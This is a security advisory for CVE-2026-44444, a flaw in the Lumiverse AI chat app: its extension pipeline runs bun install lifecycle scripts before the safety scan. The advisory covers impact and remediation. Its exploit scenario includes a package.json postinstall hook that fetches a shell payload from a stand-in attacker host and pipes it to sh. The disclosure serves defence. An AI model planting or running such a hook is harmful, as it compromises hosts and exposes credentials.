Overview
A critical remote code execution vulnerability (CVSS 9.1) has been disclosed in Lumiverse, a full-featured AI chat application. Tracked as CVE-2026-44444, the flaw affects the Spindle extension build pipeline in all versions prior to 0.9.7 and allows a malicious extension to execute arbitrary code on the system running Lumiverse during the extension installation process.
This vulnerability is distinct from the related CVE-2026-44451 (TSX sandbox escape) — both were patched in the same 0.9.7 release but exploit different parts of the extension processing pipeline.
Vulnerability Details
| Detail | Value |
|---|---|
| CVE | CVE-2026-44444 |
| CVSS Score | 9.1 (Critical) |
| Type | RCE via Package Install Lifecycle Scripts |
| Attack Vector | Malicious extension package.json |
| Authentication | Low — any user with permission to install extensions |
| Affected Product | Lumiverse AI Chat — Spindle Extension Pipeline |
| Fixed Version | 0.9.7 |
Technical Root Cause
The Spindle Extension Build Pipeline
Lumiverse supports a plugin system called Spindle, which allows third-party developers to package and distribute extensions that add functionality to the AI chat interface. When a user installs a Spindle extension, the build pipeline processes the extension package — including running bun install to resolve the extension's npm dependencies.
The Vulnerable Pattern
The critical flaw is a security scan ordered after code execution:
[Spindle Install Flow — Vulnerable]
1. Receive extension package
2. bun install ← lifecycle scripts execute HERE (no --ignore-scripts)
3. assertSafeBackendBundle ← security scan runs AFTER (too late)
4. Load extension
The bun install command is invoked without the --ignore-scripts flag. This means any preinstall, postinstall, or install scripts defined in the extension's package.json — or in any of its transitive dependencies — will be executed by Bun during the install step.
The static backend safety scanner (assertSafeBackendBundle) runs as a subsequent step, after bun install has already completed and any malicious lifecycle scripts have already executed.
Exploit Scenario
A threat actor creates a malicious Lumiverse extension and distributes it via a public or private package registry. The extension's package.json includes a lifecycle hook:
{
"name": "lumiverse-helpful-extension",
"version": "1.0.0",
"scripts": {
"postinstall": "curl https://attacker.example/payload.sh | sh"
}
}When a Lumiverse user installs this extension:
- Spindle calls
bun installon the extension package - Bun executes the
postinstallscript automatically as part of the install - The malicious script runs with the permissions of the Lumiverse process
assertSafeBackendBundlescans the extension code — but the payload has already executed
The security scan never detects the attack because the postinstall directive is standard npm package metadata, not JavaScript bundled into the extension's own code.
Impact
Successful exploitation provides:
- Arbitrary command execution on the host running Lumiverse, with OS permissions of the Lumiverse server process
- Full filesystem access to all directories readable by the Lumiverse process
- Access to environment variables including API keys, database credentials, and authentication tokens
- Network access to internal services reachable from the Lumiverse host
- Persistent access if the malicious script establishes a backdoor or scheduled task
In cloud or self-hosted Lumiverse deployments, this vulnerability could lead to full server compromise from a single extension installation.
Relationship to CVE-2026-44451
Both CVE-2026-44444 and CVE-2026-44451 affect Lumiverse's extension processing pipeline in versions prior to 0.9.7:
| CVE-2026-44444 | CVE-2026-44451 | |
|---|---|---|
| Vector | Package install lifecycle scripts | TSX dynamic function sandbox bypass |
| Stage | Extension install (build time) | Extension runtime (render time) |
| Execution context | Bun package manager → OS shell | Browser JavaScript context |
| CVSS | 9.1 | 9.3 |
| Fix | Add --ignore-scripts to bun install | Replace dynamic function sandbox |
Organizations should patch to 0.9.7 to address both vulnerabilities simultaneously.
Remediation
Upgrade
Upgrade to Lumiverse 0.9.7 immediately. The fix adds the --ignore-scripts flag to the bun install invocation and reorders the pipeline so security scanning occurs before any code execution.
Workarounds (if unable to upgrade immediately)
- Disable extension installation via Lumiverse's administration settings until the patch can be applied
- Restrict extension sources to an internal registry of pre-vetted extensions if your deployment supports this
- Run Lumiverse with a restricted service account that limits filesystem and network access to reduce blast radius
Defense-in-Depth for Extension Pipelines
The root cause here is a general architectural anti-pattern — executing code before completing security validation. For any platform with a plugin/extension system:
- Always pass
--ignore-scripts(or equivalent--no-scripts) to package managers when installing untrusted code - Security scanning must precede execution, not follow it
- Sandbox extension installation in an isolated process or container with restricted host access
- Validate extension signatures before installation to prevent tampered packages
- Apply least privilege — the extension installer process should not have access to production credentials or sensitive filesystem paths
Key Takeaways
- CVSS 9.1 Critical — a single malicious extension installation leads to full RCE on the Lumiverse host
--ignore-scriptsis not optional when processing untrusted packages — omitting it is a well-documented supply chain attack vector- Scanning after execution provides no real protection; the scan must happen first
- This pattern appears across AI application platforms — developers building similar extension systems should audit their install pipelines
- Patch to 0.9.7 closes both CVE-2026-44444 and CVE-2026-44451 simultaneously